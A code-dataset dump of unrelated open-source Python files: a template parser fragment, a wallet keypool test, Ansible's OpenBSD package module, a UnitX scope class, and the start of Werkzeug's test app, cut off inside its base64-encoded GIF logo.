for value, sub_ast in chunk.cases.items():
scope.add_case(value, variables_from_ast(sub_ast, blacklist))
target.add_scope(scope)
elif isinstance(chunk, Replacement):
if chunk.identifier not in blacklist:
target.add_variable(chunk.identifier)
elif isinstance(chunk, For):
target += variables_from_ast(chunk.body, blacklist | {chunk.new_var})
elif isinstance(chunk, str):
continue
else:
raise NotImplementedError(
"Unknown chunk type {}".format(type(chunk)))
return target
return variables_from_ast(self.ast, set())
def get_filters(self):
def filters_from_ast(ast):
filters = set()
for chunk in ast:
if isinstance(chunk, Switch):
for case in chunk.cases.values():
filters |= filters_from_ast(case)
elif isinstance(chunk, Replacement):
filters.add(chunk.filter)
elif isinstance(chunk, For):
filters |= filters_from_ast(chunk.body)
elif isinstance(chunk, str):
continue
else:
raise NotImplementedError(
"Unknown chunk type {}".format(type(chunk)))
return filters
filters = filters_from_ast(self.ast)
filters.discard(None)
return filters
def __repr__(self):
return "<template {}>".format(self.ast)
def __eq__(self, other):
return isinstance(other, Template) and self.ast == other.ast
def _parse_for(tokenizer):
token_type, value = tokenizer.peek()
assert token_type == 'for'
new_var, iterable = value
tokenizer.advance()
# Read out the body
body = _parse_chunks(tokenizer)
# Should stop reading the body at the endfor
token_type, value = tokenizer.peek()
if token_type != 'endfor':
raise ValueError("Expecting end of for, but found {}.".format(token_type))
tokenizer.advance()
return For(new_var, iterable, body)
def _parse_switch(tokenizer):
token_type, identifier = tokenizer.peek()
assert(token_type == 'switch')
cases = dict()
is_first = True
# Immediately inside should be a case, followed by lots more of those
tokenizer.advance()
while(True):
token_type, value = tokenizer.peek()
if token_type == 'case':
tokenizer.advance()
cases[value] = _parse_chunks(tokenizer)
elif token_type == 'endswitch':
tokenizer.advance()
return Switch(identifier, cases)
elif token_type == 'blob':
# Should be unreachable if not before the first as it should be picked up inside a case.
assert is_first
if not value.isspace():
raise ValueError("Unexpected blob of text outside of switch case statements. Whitespace is all that is allowed.") # noqa
tokenizer.advance()
else:
raise ValueError(
"Unexpected token of type {} inside switch. Expected a case or endswitch.".format(token_type))
is_first = False
raise RuntimeError("Unexpectedly exited the while loop in _parse_switch")
def _parse_chunks(tokenizer):
# Read Chunks
chunks = []
while True:
token_type, value = tokenizer.peek()
if token_type == 'blob':
chunks.append(value)
tokenizer.advance()
elif token_type == 'replacement':
chunks.append(Replacement(value))
tokenizer.advance()
elif token_type == 'switch':
chunks.append(_parse_switch(tokenizer))
elif token_type == 'for':
chunks.append(_parse_for(tokenizer))
else:
return chunks
def parse_str(text):
tokenizer = Tokenizer(text)
ast = _parse_chunks(tokenizer)
token_type, _ = tokenizer.peek()
if token_type != "eof":
raise ValueError(
"Unexpected token of type {} at end of text, expecting EOF".format(token_type))
return Template(ast)
def parse_resources(filename):
try:
return parse_str(resource_string(__name__, filename).decode())
except SyntaxError as ex:
# Don't accidentally overwrite a previously set filename. Shouldn't
# happen since no code this calls sets ex.filename.
assert not ex.filename
raise SyntaxError(ex.message, filename) from ex
|
jlazic/GlogSMS
|
refs/heads/master
|
sms/management/__init__.py
|
1
|
__author__ = 'josip@lazic.info'
|
Bushstar/UFO-Project
|
refs/heads/master-0.17
|
test/functional/wallet_keypool.py
|
2
|
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet keypool and interaction with wallet encryption/locking."""
import time
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
class KeyPoolTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
def run_test(self):
nodes = self.nodes
addr_before_encrypting = nodes[0].getnewaddress()
addr_before_encrypting_data = nodes[0].getaddressinfo(addr_before_encrypting)
wallet_info_old = nodes[0].getwalletinfo()
assert_equal(wallet_info_old['hdseedid'], wallet_info_old['hdmasterkeyid'])
assert(addr_before_encrypting_data['hdseedid'] == wallet_info_old['hdseedid'])
# Encrypt wallet and wait to terminate
nodes[0].node_encrypt_wallet('test')
# Restart node 0
self.start_node(0)
# Keep creating keys
addr = nodes[0].getnewaddress()
addr_data = nodes[0].getaddressinfo(addr)
wallet_info = nodes[0].getwalletinfo()
assert_equal(wallet_info['hdseedid'], wallet_info['hdmasterkeyid'])
assert(addr_before_encrypting_data['hdseedid'] != wallet_info['hdseedid'])
assert(addr_data['hdseedid'] == wallet_info['hdseedid'])
assert_raises_rpc_error(-12, "Error: Keypool ran out, please call keypoolrefill first", nodes[0].getnewaddress)
# put six (plus 2) new keys in the keypool (100% external-, +100% internal-keys, 1 in min)
nodes[0].walletpassphrase('test', 12000)
nodes[0].keypoolrefill(6)
nodes[0].walletlock()
wi = nodes[0].getwalletinfo()
assert_equal(wi['keypoolsize_hd_internal'], 6)
assert_equal(wi['keypoolsize'], 6)
# drain the internal keys
nodes[0].getrawchangeaddress()
nodes[0].getrawchangeaddress()
nodes[0].getrawchangeaddress()
nodes[0].getrawchangeaddress()
nodes[0].getrawchangeaddress()
nodes[0].getrawchangeaddress()
addr = set()
# the next one should fail
assert_raises_rpc_error(-12, "Keypool ran out", nodes[0].getrawchangeaddress)
# drain the external keys
addr.add(nodes[0].getnewaddress())
addr.add(nodes[0].getnewaddress())
addr.add(nodes[0].getnewaddress())
addr.add(nodes[0].getnewaddress())
addr.add(nodes[0].getnewaddress())
addr.add(nodes[0].getnewaddress())
assert(len(addr) == 6)
# the next one should fail
assert_raises_rpc_error(-12, "Error: Keypool ran out, please call keypoolrefill first", nodes[0].getnewaddress)
# refill keypool with three new addresses
nodes[0].walletpassphrase('test', 1)
nodes[0].keypoolrefill(3)
# test walletpassphrase timeout
time.sleep(1.1)
assert_equal(nodes[0].getwalletinfo()["unlocked_until"], 0)
# drain them by mining
nodes[0].generate(1)
nodes[0].generate(1)
nodes[0].generate(1)
assert_raises_rpc_error(-12, "Keypool ran out", nodes[0].generate, 1)
nodes[0].walletpassphrase('test', 100)
nodes[0].keypoolrefill(100)
wi = nodes[0].getwalletinfo()
assert_equal(wi['keypoolsize_hd_internal'], 100)
assert_equal(wi['keypoolsize'], 100)
if __name__ == '__main__':
KeyPoolTest().main()
|
toshywoshy/ansible
|
refs/heads/devel
|
lib/ansible/modules/packaging/os/openbsd_pkg.py
|
79
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Patrik Lundin <patrik@sigterm.se>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: openbsd_pkg
author:
- Patrik Lundin (@eest)
version_added: "1.1"
short_description: Manage packages on OpenBSD
description:
- Manage packages on OpenBSD using the pkg tools.
requirements:
- python >= 2.5
options:
name:
description:
- A name or a list of names of the packages.
required: yes
state:
description:
- C(present) will make sure the package is installed.
C(latest) will make sure the latest version of the package is installed.
C(absent) will make sure the specified package is not installed.
choices: [ absent, latest, present ]
default: present
build:
description:
- Build the package from source instead of downloading and installing
a binary. Requires that the port source tree is already installed.
Automatically builds and installs the 'sqlports' package, if it is
not already installed.
type: bool
default: 'no'
version_added: "2.1"
ports_dir:
description:
- When used in combination with the C(build) option, allows overriding
the default ports source directory.
default: /usr/ports
version_added: "2.1"
clean:
description:
- When updating or removing packages, delete the extra configuration
file(s) in the old packages which are annotated with @extra in
the packaging-list.
type: bool
default: 'no'
version_added: "2.3"
quick:
description:
- Replace or delete packages quickly; do not bother with checksums
before removing normal files.
type: bool
default: 'no'
version_added: "2.3"
notes:
- When used with a `loop:` each package will be processed individually,
it is much more efficient to pass the list directly to the `name` option.
'''
EXAMPLES = '''
- name: Make sure nmap is installed
openbsd_pkg:
name: nmap
state: present
- name: Make sure nmap is the latest version
openbsd_pkg:
name: nmap
state: latest
- name: Make sure nmap is not installed
openbsd_pkg:
name: nmap
state: absent
- name: Make sure nmap is installed, build it from source if it is not
openbsd_pkg:
name: nmap
state: present
build: yes
- name: Specify a pkg flavour with '--'
openbsd_pkg:
name: vim--no_x11
state: present
- name: Specify the default flavour to avoid ambiguity errors
openbsd_pkg:
name: vim--
state: present
- name: Specify a package branch (requires at least OpenBSD 6.0)
openbsd_pkg:
name: python%3.5
state: present
- name: Update all packages on the system
openbsd_pkg:
name: '*'
state: latest
- name: Purge a package and it's configuration files
openbsd_pkg:
name: mpd
clean: yes
state: absent
- name: Quickly remove a package without checking checksums
openbsd_pkg:
name: qt5
quick: yes
state: absent
'''
import os
import platform
import re
import shlex
import sqlite3
from distutils.version import StrictVersion
from ansible.module_utils.basic import AnsibleModule
# Function used for executing commands.
def execute_command(cmd, module):
# Break command line into arguments.
# This makes run_command() use shell=False which we need to not cause shell
# expansion of special characters like '*'.
cmd_args = shlex.split(cmd)
return module.run_command(cmd_args)
# Function used to find out if a package is currently installed.
def get_package_state(names, pkg_spec, module):
info_cmd = 'pkg_info -Iq'
for name in names:
command = "%s inst:%s" % (info_cmd, name)
rc, stdout, stderr = execute_command(command, module)
if stderr:
module.fail_json(msg="failed in get_package_state(): " + stderr)
if stdout:
# If the requested package name is just a stem, like "python", we may
# find multiple packages with that name.
pkg_spec[name]['installed_names'] = [installed_name for installed_name in stdout.splitlines()]
module.debug("get_package_state(): installed_names = %s" % pkg_spec[name]['installed_names'])
pkg_spec[name]['installed_state'] = True
else:
pkg_spec[name]['installed_state'] = False
# Function used to make sure a package is present.
def package_present(names, pkg_spec, module):
build = module.params['build']
for name in names:
# It is possible package_present() has been called from package_latest().
# In that case we do not want to operate on the whole list of names,
# only the leftovers.
if pkg_spec['package_latest_leftovers']:
if name not in pkg_spec['package_latest_leftovers']:
module.debug("package_present(): ignoring '%s' which is not a package_latest() leftover" % name)
continue
else:
module.debug("package_present(): handling package_latest() leftovers, installing '%s'" % name)
if module.check_mode:
install_cmd = 'pkg_add -Imn'
else:
if build is True:
port_dir = "%s/%s" % (module.params['ports_dir'], get_package_source_path(name, pkg_spec, module))
if os.path.isdir(port_dir):
if pkg_spec[name]['flavor']:
flavors = pkg_spec[name]['flavor'].replace('-', ' ')
install_cmd = "cd %s && make clean=depends && FLAVOR=\"%s\" make install && make clean=depends" % (port_dir, flavors)
elif pkg_spec[name]['subpackage']:
install_cmd = "cd %s && make clean=depends && SUBPACKAGE=\"%s\" make install && make clean=depends" % (port_dir,
pkg_spec[name]['subpackage'])
else:
install_cmd = "cd %s && make install && make clean=depends" % (port_dir)
else:
module.fail_json(msg="the port source directory %s does not exist" % (port_dir))
else:
install_cmd = 'pkg_add -Im'
if pkg_spec[name]['installed_state'] is False:
# Attempt to install the package
if build is True and not module.check_mode:
(pkg_spec[name]['rc'], pkg_spec[name]['stdout'], pkg_spec[name]['stderr']) = module.run_command(install_cmd, module, use_unsafe_shell=True)
else:
(pkg_spec[name]['rc'], pkg_spec[name]['stdout'], pkg_spec[name]['stderr']) = execute_command("%s %s" % (install_cmd, name), module)
# The behaviour of pkg_add is a bit different depending on if a
# specific version is supplied or not.
#
# When a specific version is supplied the return code will be 0 when
# a package is found and 1 when it is not. If a version is not
# supplied the tool will exit 0 in both cases.
#
# It is important to note that "version" relates to the
# packages-specs(7) notion of a version. If using the branch syntax
# (like "python%3.5") even though a branch name may look like a
# version string it is not used an one by pkg_add.
if pkg_spec[name]['version'] or build is True:
# Depend on the return code.
module.debug("package_present(): depending on return code for name '%s'" % name)
if pkg_spec[name]['rc']:
pkg_spec[name]['changed'] = False
else:
# Depend on stderr instead.
module.debug("package_present(): depending on stderr for name '%s'" % name)
if pkg_spec[name]['stderr']:
# There is a corner case where having an empty directory in
# installpath prior to the right location will result in a
# "file:/local/package/directory/ is empty" message on stderr
# while still installing the package, so we need to look for
# for a message like "packagename-1.0: ok" just in case.
match = re.search(r"\W%s-[^:]+: ok\W" % pkg_spec[name]['stem'], pkg_spec[name]['stdout'])
if match:
# It turns out we were able to install the package.
module.debug("package_present(): we were able to install package for name '%s'" % name)
else:
# We really did fail, fake the return code.
module.debug("package_present(): we really did fail for name '%s'" % name)
pkg_spec[name]['rc'] = 1
pkg_spec[name]['changed'] = False
else:
module.debug("package_present(): stderr was not set for name '%s'" % name)
if pkg_spec[name]['rc'] == 0:
pkg_spec[name]['changed'] = True
else:
pkg_spec[name]['rc'] = 0
pkg_spec[name]['stdout'] = ''
pkg_spec[name]['stderr'] = ''
pkg_spec[name]['changed'] = False
# Function used to make sure a package is the latest available version.
def package_latest(names, pkg_spec, module):
if module.params['build'] is True:
module.fail_json(msg="the combination of build=%s and state=latest is not supported" % module.params['build'])
upgrade_cmd = 'pkg_add -um'
if module.check_mode:
upgrade_cmd += 'n'
if module.params['clean']:
upgrade_cmd += 'c'
if module.params['quick']:
upgrade_cmd += 'q'
for name in names:
if pkg_spec[name]['installed_state'] is True:
# Attempt to upgrade the package.
(pkg_spec[name]['rc'], pkg_spec[name]['stdout'], pkg_spec[name]['stderr']) = execute_command("%s %s" % (upgrade_cmd, name), module)
# Look for output looking something like "nmap-6.01->6.25: ok" to see if
# something changed (or would have changed). Use \W to delimit the match
# from progress meter output.
pkg_spec[name]['changed'] = False
for installed_name in pkg_spec[name]['installed_names']:
module.debug("package_latest(): checking for pre-upgrade package name: %s" % installed_name)
match = re.search(r"\W%s->.+: ok\W" % installed_name, pkg_spec[name]['stdout'])
if match:
module.debug("package_latest(): pre-upgrade package name match: %s" % installed_name)
pkg_spec[name]['changed'] = True
break
# FIXME: This part is problematic. Based on the issues mentioned (and
# handled) in package_present() it is not safe to blindly trust stderr
# as an indicator that the command failed, and in the case with
# empty installpath directories this will break.
#
# For now keep this safeguard here, but ignore it if we managed to
# parse out a successful update above. This way we will report a
# successful run when we actually modify something but fail
# otherwise.
if pkg_spec[name]['changed'] is not True:
if pkg_spec[name]['stderr']:
pkg_spec[name]['rc'] = 1
else:
# Note packages that need to be handled by package_present
module.debug("package_latest(): package '%s' is not installed, will be handled by package_present()" % name)
pkg_spec['package_latest_leftovers'].append(name)
# If there were any packages that were not installed we call
# package_present() which will handle those.
if pkg_spec['package_latest_leftovers']:
module.debug("package_latest(): calling package_present() to handle leftovers")
package_present(names, pkg_spec, module)
# Function used to make sure a package is not installed.
def package_absent(names, pkg_spec, module):
remove_cmd = 'pkg_delete -I'
if module.check_mode:
remove_cmd += 'n'
if module.params['clean']:
remove_cmd += 'c'
if module.params['quick']:
remove_cmd += 'q'
for name in names:
if pkg_spec[name]['installed_state'] is True:
# Attempt to remove the package.
(pkg_spec[name]['rc'], pkg_spec[name]['stdout'], pkg_spec[name]['stderr']) = execute_command("%s %s" % (remove_cmd, name), module)
if pkg_spec[name]['rc'] == 0:
pkg_spec[name]['changed'] = True
else:
pkg_spec[name]['changed'] = False
else:
pkg_spec[name]['rc'] = 0
pkg_spec[name]['stdout'] = ''
pkg_spec[name]['stderr'] = ''
pkg_spec[name]['changed'] = False
# Function used to parse the package name based on packages-specs(7).
# The general name structure is "stem-version[-flavors]".
#
# Names containing "%" are a special variation not part of the
# packages-specs(7) syntax. See pkg_add(1) on OpenBSD 6.0 or later for a
# description.
def parse_package_name(names, pkg_spec, module):
# Initialize empty list of package_latest() leftovers.
pkg_spec['package_latest_leftovers'] = []
for name in names:
module.debug("parse_package_name(): parsing name: %s" % name)
# Do some initial matches so we can base the more advanced regex on that.
version_match = re.search("-[0-9]", name)
versionless_match = re.search("--", name)
# Stop if someone is giving us a name that both has a version and is
# version-less at the same time.
if version_match and versionless_match:
module.fail_json(msg="package name both has a version and is version-less: " + name)
# All information for a given name is kept in the pkg_spec keyed by that name.
pkg_spec[name] = {}
# If name includes a version.
if version_match:
match = re.search("^(?P<stem>[^%]+)-(?P<version>[0-9][^-]*)(?P<flavor_separator>-)?(?P<flavor>[a-z].*)?(%(?P<branch>.+))?$", name)
if match:
pkg_spec[name]['stem'] = match.group('stem')
pkg_spec[name]['version_separator'] = '-'
pkg_spec[name]['version'] = match.group('version')
pkg_spec[name]['flavor_separator'] = match.group('flavor_separator')
pkg_spec[name]['flavor'] = match.group('flavor')
pkg_spec[name]['branch'] = match.group('branch')
pkg_spec[name]['style'] = 'version'
module.debug("version_match: stem: %(stem)s, version: %(version)s, flavor_separator: %(flavor_separator)s, "
"flavor: %(flavor)s, branch: %(branch)s, style: %(style)s" % pkg_spec[name])
else:
module.fail_json(msg="unable to parse package name at version_match: " + name)
# If name includes no version but is version-less ("--").
elif versionless_match:
match = re.search("^(?P<stem>[^%]+)--(?P<flavor>[a-z].*)?(%(?P<branch>.+))?$", name)
if match:
pkg_spec[name]['stem'] = match.group('stem')
pkg_spec[name]['version_separator'] = '-'
pkg_spec[name]['version'] = None
pkg_spec[name]['flavor_separator'] = '-'
pkg_spec[name]['flavor'] = match.group('flavor')
pkg_spec[name]['branch'] = match.group('branch')
pkg_spec[name]['style'] = 'versionless'
module.debug("versionless_match: stem: %(stem)s, flavor: %(flavor)s, branch: %(branch)s, style: %(style)s" % pkg_spec[name])
else:
module.fail_json(msg="unable to parse package name at versionless_match: " + name)
# If name includes no version, and is not version-less, it is all a
# stem, possibly with a branch (%branchname) tacked on at the
# end.
else:
match = re.search("^(?P<stem>[^%]+)(%(?P<branch>.+))?$", name)
if match:
pkg_spec[name]['stem'] = match.group('stem')
pkg_spec[name]['version_separator'] = None
pkg_spec[name]['version'] = None
pkg_spec[name]['flavor_separator'] = None
pkg_spec[name]['flavor'] = None
pkg_spec[name]['branch'] = match.group('branch')
pkg_spec[name]['style'] = 'stem'
module.debug("stem_match: stem: %(stem)s, branch: %(branch)s, style: %(style)s" % pkg_spec[name])
else:
module.fail_json(msg="unable to parse package name at else: " + name)
# Verify that the managed host is new enough to support branch syntax.
if pkg_spec[name]['branch']:
branch_release = "6.0"
if StrictVersion(platform.release()) < StrictVersion(branch_release):
module.fail_json(msg="package name using 'branch' syntax requires at least OpenBSD %s: %s" % (branch_release, name))
# Sanity check that there are no trailing dashes in flavor.
# Try to stop strange stuff early so we can be strict later.
if pkg_spec[name]['flavor']:
match = re.search("-$", pkg_spec[name]['flavor'])
if match:
module.fail_json(msg="trailing dash in flavor: " + pkg_spec[name]['flavor'])
# Function used for figuring out the port path.
def get_package_source_path(name, pkg_spec, module):
pkg_spec[name]['subpackage'] = None
if pkg_spec[name]['stem'] == 'sqlports':
return 'databases/sqlports'
else:
# try for an exact match first
sqlports_db_file = '/usr/local/share/sqlports'
if not os.path.isfile(sqlports_db_file):
module.fail_json(msg="sqlports file '%s' is missing" % sqlports_db_file)
conn = sqlite3.connect(sqlports_db_file)
first_part_of_query = 'SELECT fullpkgpath, fullpkgname FROM ports WHERE fullpkgname'
query = first_part_of_query + ' = ?'
module.debug("package_package_source_path(): exact query: %s" % query)
cursor = conn.execute(query, (name,))
results = cursor.fetchall()
# next, try for a fuzzier match
if len(results) < 1:
looking_for = pkg_spec[name]['stem'] + (pkg_spec[name]['version_separator'] or '-') + (pkg_spec[name]['version'] or '%')
query = first_part_of_query + ' LIKE ?'
if pkg_spec[name]['flavor']:
looking_for += pkg_spec[name]['flavor_separator'] + pkg_spec[name]['flavor']
module.debug("package_package_source_path(): fuzzy flavor query: %s" % query)
cursor = conn.execute(query, (looking_for,))
elif pkg_spec[name]['style'] == 'versionless':
query += ' AND fullpkgname NOT LIKE ?'
module.debug("package_package_source_path(): fuzzy versionless query: %s" % query)
cursor = conn.execute(query, (looking_for, "%s-%%" % looking_for,))
else:
module.debug("package_package_source_path(): fuzzy query: %s" % query)
cursor = conn.execute(query, (looking_for,))
results = cursor.fetchall()
# error if we don't find exactly 1 match
conn.close()
if len(results) < 1:
module.fail_json(msg="could not find a port by the name '%s'" % name)
if len(results) > 1:
matches = map(lambda x: x[1], results)
module.fail_json(msg="too many matches, unsure which to build: %s" % ' OR '.join(matches))
# there's exactly 1 match, so figure out the subpackage, if any, then return
fullpkgpath = results[0][0]
parts = fullpkgpath.split(',')
if len(parts) > 1 and parts[1][0] == '-':
pkg_spec[name]['subpackage'] = parts[1]
return parts[0]
# Function used for upgrading all installed packages.
def upgrade_packages(pkg_spec, module):
if module.check_mode:
upgrade_cmd = 'pkg_add -Imnu'
else:
upgrade_cmd = 'pkg_add -Imu'
# Create a minimal pkg_spec entry for '*' to store return values.
pkg_spec['*'] = {}
# Attempt to upgrade all packages.
pkg_spec['*']['rc'], pkg_spec['*']['stdout'], pkg_spec['*']['stderr'] = execute_command("%s" % upgrade_cmd, module)
# Try to find any occurrence of a package changing version like:
# "bzip2-1.0.6->1.0.6p0: ok".
match = re.search(r"\W\w.+->.+: ok\W", pkg_spec['*']['stdout'])
if match:
pkg_spec['*']['changed'] = True
else:
pkg_spec['*']['changed'] = False
# It seems we can not trust the return value, so depend on the presence of
# stderr to know if something failed.
if pkg_spec['*']['stderr']:
pkg_spec['*']['rc'] = 1
else:
pkg_spec['*']['rc'] = 0
# ===========================================
# Main control flow.
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(type='list', required=True),
state=dict(type='str', default='present', choices=['absent', 'installed', 'latest', 'present', 'removed']),
build=dict(type='bool', default=False),
ports_dir=dict(type='path', default='/usr/ports'),
quick=dict(type='bool', default=False),
clean=dict(type='bool', default=False),
),
supports_check_mode=True
)
name = module.params['name']
state = module.params['state']
build = module.params['build']
ports_dir = module.params['ports_dir']
rc = 0
stdout = ''
stderr = ''
result = {}
result['name'] = name
result['state'] = state
result['build'] = build
# The data structure used to keep track of package information.
pkg_spec = {}
if build is True:
if not os.path.isdir(ports_dir):
module.fail_json(msg="the ports source directory %s does not exist" % (ports_dir))
# build sqlports if its not installed yet
parse_package_name(['sqlports'], pkg_spec, module)
get_package_state(['sqlports'], pkg_spec, module)
if not pkg_spec['sqlports']['installed_state']:
module.debug("main(): installing 'sqlports' because build=%s" % module.params['build'])
package_present(['sqlports'], pkg_spec, module)
asterisk_name = False
for n in name:
if n == '*':
if len(name) != 1:
module.fail_json(msg="the package name '*' can not be mixed with other names")
asterisk_name = True
if asterisk_name:
if state != 'latest':
module.fail_json(msg="the package name '*' is only valid when using state=latest")
else:
# Perform an upgrade of all installed packages.
upgrade_packages(pkg_spec, module)
else:
# Parse package names and put results in the pkg_spec dictionary.
parse_package_name(name, pkg_spec, module)
# Not sure how the branch syntax is supposed to play together
# with build mode. Disable it for now.
for n in name:
if pkg_spec[n]['branch'] and module.params['build'] is True:
module.fail_json(msg="the combination of 'branch' syntax and build=%s is not supported: %s" % (module.params['build'], n))
# Get state for all package names.
get_package_state(name, pkg_spec, module)
# Perform requested action.
if state in ['installed', 'present']:
package_present(name, pkg_spec, module)
elif state in ['absent', 'removed']:
package_absent(name, pkg_spec, module)
elif state == 'latest':
package_latest(name, pkg_spec, module)
# The combined changed status for all requested packages. If anything
# is changed this is set to True.
combined_changed = False
# The combined failed status for all requested packages. If anything
# failed this is set to True.
combined_failed = False
# We combine all error messages in this comma separated string, for example:
# "msg": "Can't find nmapp\n, Can't find nmappp\n"
combined_error_message = ''
# Loop over all requested package names and check if anything failed or
# changed.
for n in name:
if pkg_spec[n]['rc'] != 0:
combined_failed = True
if pkg_spec[n]['stderr']:
if combined_error_message:
combined_error_message += ", %s" % pkg_spec[n]['stderr']
else:
combined_error_message = pkg_spec[n]['stderr']
else:
if combined_error_message:
combined_error_message += ", %s" % pkg_spec[n]['stdout']
else:
combined_error_message = pkg_spec[n]['stdout']
if pkg_spec[n]['changed'] is True:
combined_changed = True
# If combined_error_message contains anything at least some part of the
# list of requested package names failed.
if combined_failed:
module.fail_json(msg=combined_error_message, **result)
result['changed'] = combined_changed
module.exit_json(**result)
if __name__ == '__main__':
main()
|
supertask/UnitX
|
refs/heads/master
|
src/scope.py
|
4
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import sys
from collegue import Collegue
from constants import Constants
class Scope(dict, Collegue):
"""A class saving instances of a UnitXObject class.
This class is created by a ScopeList class, when a block statement
appeared in a running point.
And, the running point can use instances of UnitXObject existing in this
class during this class is alive.
But this class is deleted by a ScopeList class, when a block statement
disappeared in a running point. And then, the running point cannot use instances
of UnitXObject existed in this class.
Attributes:
parent: An instance of a parent Scope of this class.
"""
def __init__(self, parent):
""" Inits attributes of a Scope class. """
self.parent = parent
def find_scope_of(self, varname):
"""Returns an instance of a Scope class indicating varname.
Returns An instance indicating varname, if it exists in this scope
or ancestral parent scopes.
Args:
varname: A string of a variable.
Returns:
An instance of a Scope class indicating varname.
"""
if varname in self: return self
else:
if self.parent == None: return None # For finishing
tmp = self.parent.find_scope_of(varname)
return tmp # Search recursively
@classmethod
def set_mediator(self, mediator):
"""Sets a mediator for Mediator pattern of GoF.
Args:
mediator: An instance of a EvalVisitor class inherited Mediator class.
"""
self.mediator = mediator
def main():
"""Run an example for a Scope class."""
from unitx_object import UnitXObject
from unit import Unit
grandparent = Scope(None)
grandparent['x'] = UnitXObject(value=2, varname=None, unit=Unit())
grandparent['z'] = UnitXObject(value=4, varname=None, unit=Unit())
parent = Scope(grandparent)
parent['y'] = UnitXObject(value=3, varname=None, unit=Unit())
child = Scope(parent)
print 'A grandparent scope instance: ', grandparent
print 'A parent scope instance: ', parent
print 'A child scope instance: ', child
found_scope = child.find_scope_of('x')
print 'A value of a "x": ', found_scope['x']
found_scope = child.find_scope_of('y')
print 'A value of a "y": ', found_scope['y']
found_scope = child.find_scope_of('z')
print 'A value of a "z": ', found_scope['z']
print child.parent.parent
return Constants.EXIT_SUCCESS
if __name__ == '__main__':
sys.exit(main())
|
EmmanuelJohnson/ssquiz
|
refs/heads/master
|
flask/lib/python2.7/site-packages/werkzeug/testapp.py
|
294
|
# -*- coding: utf-8 -*-
"""
werkzeug.testapp
~~~~~~~~~~~~~~~~
Provide a small test application that can be used to test a WSGI server
and check it for WSGI compliance.
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import werkzeug
from textwrap import wrap
from werkzeug.wrappers import BaseRequest as Request, BaseResponse as Response
from werkzeug.utils import escape
import base64
logo = Response(base64.b64decode(
'''R0lGODlhoACgAOMIAAEDACwpAEpCAGdgAJaKAM28AOnVAP3rAP/////////
//////////////////////yH5BAEKAAgALAAAAACgAKAAAAT+EMlJq704680R+F0ojmRpnuj0rWnrv
nB8rbRs33gu0bzu/0AObxgsGn3D5HHJbCUFyqZ0ukkSDlAidctNFg7gbI9LZlrBaHGtzAae0eloe25
7w9EDOX2fst/xenyCIn5/gFqDiVVDV4aGeYiKkhSFjnCQY5OTlZaXgZp8nJ2ekaB0SQOjqphrpnOiq
ncEn65UsLGytLVmQ6m4sQazpbtLqL/HwpnER8bHyLrLOc3Oz8PRONPU1crXN9na263dMt/g4SzjMeX
m5yDpLqgG7OzJ4u8lT/P69ej3JPn69kHzN2OIAHkB9RUYSFCFQYQJFTIkCDBiwoXWGnowaLEjRm7+G
p9A7Hhx4rUkAUaSLJlxHMqVMD/aSycSZkyTplCqtGnRAM5NQ1Ly5OmzZc6gO4d6DGAUKA+hSocWYAo
SlM6oUWX2O/o0KdaVU5vuSQLAa0ADwQgMEMB2AIECZhVSnTno6spgbtXmHcBUrQACcc2FrTrWS8wAf
78cMFBgwIBgbN+qvTt3ayikRBk7BoyGAGABAdYyfdzRQGV3l4coxrqQ84GpUBmrdR3xNIDUPAKDBSA
ADIGDhhqTZIWaDcrVX8EsbNzbkvCOxG8bN5w8ly9H8jyTJHC6DFndQydbguh2e/ctZJFXRxMAqqPVA
tQH5E64SPr1f0zz7sQYjAHg0In+JQ11+N2B0XXBeeYZgBZFx4tqBToiTCPv0YBgQv8JqA6BEf6RhXx
w1ENhRBnWV8ctEX4Ul2zc3aVGcQNC2KElyTDYyYUWvShdjDyMOGMuFjqnII45aogPhz/CodUHFwaDx
lTgsaOjNyhGWJQd+lFoAGk8ObghI0kawg+EV5blH3dr+digkYuAGSaQZFHFz2P/cTaLmhF52QeSb45
Jwxd+uSVGHlqOZpOeJpCFZ5J+rkAkFjQ0N1tah7JJSZUFNsrkeJUJMIBi8jyaEKIhKPomnC91Uo+NB
yyaJ5umnnpInIFh4t6ZSpGaAVmizqjpByDegYl8tPE0phCYrhcMWSv+uAqHfgH88ak5UXZmlKLVJhd
dj78s1Fxnzo6yUCrV6rrDOkluG+QzCAUTbCwf9SrmMLzK6p+OPHx7DF+bsfMRq7Ec61Av9i6GLw23r
idnZ+/OO0a99pbIrJkproCQMA17OPG6suq3cca5ruDfXCCDoS7BEdvmJn5otdqscn+uogRHHXs8cbh
EIfYaDY1AkrC0cqwcZpnM6ludx72x0p7Fo/hZAcpJDjax0UdHavMKAbiKltMWCF3xxh9k25N/Viud8
ba78iCvUkt+V6BpwMlErmcgc502x+u1nSxJSJP9Mi52awD1V4yB/QHONsnU3L+A/zR4VL/indx/y64
gqcj+qgTeweM86f0Qy1QVbvmWH1D9h+alqg254QD8HJXHvjQaGOqEqC22M54PcftZVKVSQG9jhkv7C
JyTyDoAJfPdu8v7DRZAxsP/ky9MJ3OL36DJfCFPASC3/aXlfLOOON9vGZZHydGf8LnxYJuuVIbl83y
Az5n/RPz07E+9+zw2A2ahz4HxHo9Kt79HTMx1Q7ma7zAzHgHqYH0SoZWyTuOLMiHwSfZDAQTn0ajk9
YQqodnUYjByQZhZak9Wu4gYQsMyEpIOAOQKze8CmEF45KuAHTvIDOfHJNipwoHMuGHBnJElUoDmAyX
c2Qm/R8Ah/iILCCJOEokGowdhDYc/yoL+vpRGwyVSCWFYZNljkhEirGXsalWcAgOdeAdoXcktF2udb
qbUhjWyMQxYO01o6KYKOr6iK3fE4MaS+DsvBsGOBaMb0Y6IxADaJhFICaOLmiWTlDAnY1KzDG4ambL
